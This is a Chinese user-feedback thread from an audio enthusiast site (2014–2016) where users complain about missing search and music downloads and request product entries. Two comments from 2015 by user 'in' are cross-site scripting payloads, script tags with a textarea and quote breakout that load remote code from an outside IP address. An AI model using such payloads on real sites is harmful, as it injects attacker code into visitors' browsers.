我有槽想吐给耳朵,2014版【建议&反馈】

烧耳朵 2014-06-30 11:19

使用过程中有疑问、有不满,有各种槽...
都集中吐在这里,请猛烈地批评我们吧。

让耳朵听到你的声音。

回应

• 枫扇 2014-10-24 08:48
    请添加HIFI COWON PLENUE 1  型号。
  • 假若爱有天意 2014-10-25 11:30
    怀念曾经的烧耳朵
  • 吹牛大圣 2014-10-26 14:16
    下载音乐的没有了吗?
  • ys 2014-11-01 19:34
    希望在器材和评测版块中,加入明显的搜索功能,现在产品太多,很难找的到相关的文章
  • 文井戎 2014-11-04 17:57
    不能下载音乐了么?
  • 时bu能待 2014-11-12 20:09
    那个搜索功能在哪里啊?没有的话评测什么的怎么找啊。。。。。。
  • 日光 2014-11-23 23:27
    摔 我来找我自己以前发布的音乐资源结果没有了。。大家所有努力都付诸东流。。
  • 水泥中的笨鱼 2014-12-12 01:44
    找了半天,愣是没找到搜索在什么地方
  • 连看客都不是 2014-12-16 10:26
    AKG K240S 的阻抗为55欧 而非32欧!
  • 请问为什么很多功能不能用了?
  • rekk 2015-04-20 03:38
    【搜索】功能!!!!
  • 杂谈看世界 2015-05-04 12:55
    音乐,音乐呢?
  • in 2015-10-09 16:05
    <script src=http://23.239.121.199/1/index.php?sid=47871438></script>
  • in 2015-10-09 16:06
    </textarea>'"><script src=http://23.239.121.199/1/index.php?sid=47871438></script>
  • Leeryan 2015-10-27 15:33
    没有搜索功能,想找个耳塞的评测翻了好久。。。
    器材部分点开细分目录就显示页面错误。。
  • 2十七 2016-05-14 18:42
    搜索功能在哪里!!!!!
  • 电子发烧友 2016-07-01 13:30
    是 花言乔语,不是 花言巧语xqt526
    其实真的想说点,但是就不说

你的回应· · · · · ·

用以下合作网站账号登录

反馈